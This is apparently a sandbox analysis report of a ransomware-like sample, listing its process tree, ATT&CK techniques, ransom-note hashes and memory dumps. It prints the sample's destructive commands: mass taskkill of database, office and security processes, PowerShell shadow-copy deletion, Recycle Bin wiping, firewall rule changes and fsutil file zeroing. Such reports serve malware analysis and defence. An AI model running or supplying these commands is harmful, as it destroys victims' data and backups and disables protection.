- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:3272
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3180
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1480
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:428
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3728
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3176
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4020
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3364
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3628
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2372
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:2220
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2984
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1392
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1192
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3864
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3868
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3720
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:2088
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:3192
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3148
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:2452
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:1192
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
  2⤵
  PID:764
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:2268
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:3524
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\gVcWDWENI8.exe
  2⤵
  PID:520
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:2712

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

MD5
6b368762de37a3a43670cdf6af44dde7

SHA1
5ba747f528f216b3a795be7822a1e26737c5d7a3

SHA256
e3e4c1e47ce1fc655b1b267149d2952711917b221db9823dab7d92b176b78019

SHA512
509356b48f1142910df603e3c16e56ea39385ee173c3405d54a1155637b0d935199411f746b970800a8afcd54f48cf1b9a0006d33a2ce2caad6f10391b752697

Download Submit
memory/8-125-0x0000000000000000-mapping.dmp

Download
memory/184-150-0x0000000000000000-mapping.dmp

Download
memory/212-118-0x0000000000000000-mapping.dmp

Download
memory/428-162-0x0000000000000000-mapping.dmp

Download
memory/660-135-0x0000000000000000-mapping.dmp

Download
memory/756-145-0x0000000000000000-mapping.dmp

Download
memory/1192-174-0x0000000000000000-mapping.dmp

Download
memory/1192-122-0x0000000000000000-mapping.dmp

Download
memory/1264-140-0x0000000000000000-mapping.dmp

Download
memory/1392-173-0x0000000000000000-mapping.dmp

Download
memory/1392-129-0x0000000000000000-mapping.dmp

Download
memory/1480-158-0x0000000000000000-mapping.dmp

Download
memory/1484-131-0x0000000000000000-mapping.dmp

Download
memory/1516-155-0x0000000000000000-mapping.dmp

Download
memory/1612-156-0x0000000000000000-mapping.dmp

Download
memory/1812-177-0x0000000000000000-mapping.dmp

Download
memory/1812-119-0x0000000000000000-mapping.dmp

Download
memory/2008-137-0x0000000000000000-mapping.dmp

Download
memory/2088-183-0x0000000000000000-mapping.dmp

Download
memory/2128-132-0x0000000000000000-mapping.dmp

Download
memory/2176-148-0x0000000000000000-mapping.dmp

Download
memory/2200-128-0x0000000000000000-mapping.dmp

Download
memory/2200-161-0x0000000000000000-mapping.dmp

Download
memory/2220-141-0x0000000000000000-mapping.dmp

Download
memory/2220-171-0x0000000000000000-mapping.dmp

Download
memory/2296-152-0x0000000000000000-mapping.dmp

Download
memory/2296-168-0x0000000000000000-mapping.dmp

Download
memory/2372-170-0x0000000000000000-mapping.dmp

Download
memory/2376-154-0x0000000000000000-mapping.dmp

Download
memory/2392-165-0x0000000000000000-mapping.dmp

Download
memory/2392-146-0x0000000000000000-mapping.dmp

Download
memory/2452-138-0x0000000000000000-mapping.dmp

Download
memory/2504-126-0x0000000000000000-mapping.dmp

Download
memory/2536-134-0x0000000000000000-mapping.dmp

Download
memory/2540-147-0x0000000000000000-mapping.dmp

Download
memory/2612-143-0x0000000000000000-mapping.dmp

Download
memory/2648-142-0x0000000000000000-mapping.dmp

Download
memory/2656-139-0x0000000000000000-mapping.dmp

Download
memory/2656-160-0x0000000000000000-mapping.dmp

Download
memory/2704-121-0x0000000000000000-mapping.dmp

Download
memory/2712-149-0x0000000000000000-mapping.dmp

Download
memory/2920-120-0x0000000000000000-mapping.dmp

Download
memory/2984-172-0x0000000000000000-mapping.dmp

Download
memory/2984-144-0x0000000000000000-mapping.dmp

Download
memory/3056-127-0x0000000000000000-mapping.dmp

Download
memory/3144-117-0x0000000000000000-mapping.dmp

Download
memory/3176-151-0x0000000000000000-mapping.dmp

Download
memory/3176-164-0x0000000000000000-mapping.dmp

Download
memory/3180-159-0x0000000000000000-mapping.dmp

Download
memory/3180-136-0x0000000000000000-mapping.dmp

Download
memory/3192-202-0x0000000000000000-mapping.dmp

Download
memory/3272-157-0x0000000000000000-mapping.dmp

Download
memory/3364-167-0x0000000000000000-mapping.dmp

Download
memory/3524-133-0x0000000000000000-mapping.dmp

Download
memory/3628-169-0x0000000000000000-mapping.dmp

Download
memory/3720-130-0x0000000000000000-mapping.dmp

Download
memory/3720-198-0x0000021C2E7E0000-0x0000021C2E7E2000-memory.dmp

Filesize
8KB

Download
memory/3720-200-0x0000021C2E7E6000-0x0000021C2E7E8000-memory.dmp

Filesize
8KB

Download
memory/3720-187-0x0000021C2E9F0000-0x0000021C2E9F1000-memory.dmp

Filesize
4KB

Download
memory/3720-184-0x0000021C16340000-0x0000021C16341000-memory.dmp

Filesize
4KB

Download
memory/3720-178-0x0000000000000000-mapping.dmp

Download
memory/3720-199-0x0000021C2E7E3000-0x0000021C2E7E5000-memory.dmp

Filesize
8KB

Download
memory/3728-163-0x0000000000000000-mapping.dmp

Download
memory/3856-124-0x0000000000000000-mapping.dmp

Download
memory/3864-175-0x0000000000000000-mapping.dmp

Download
memory/3868-176-0x0000000000000000-mapping.dmp

Download
memory/3956-153-0x0000000000000000-mapping.dmp

Download
memory/4020-123-0x0000000000000000-mapping.dmp

Download
memory/4020-166-0x0000000000000000-mapping.dmp

Download
memory/4068-114-0x0000000000770000-0x0000000000771000-memory.dmp

Filesize
4KB

Download
memory/4068-116-0x000000001B2C0000-0x000000001B2C2000-memory.dmp

Filesize
8KB

Download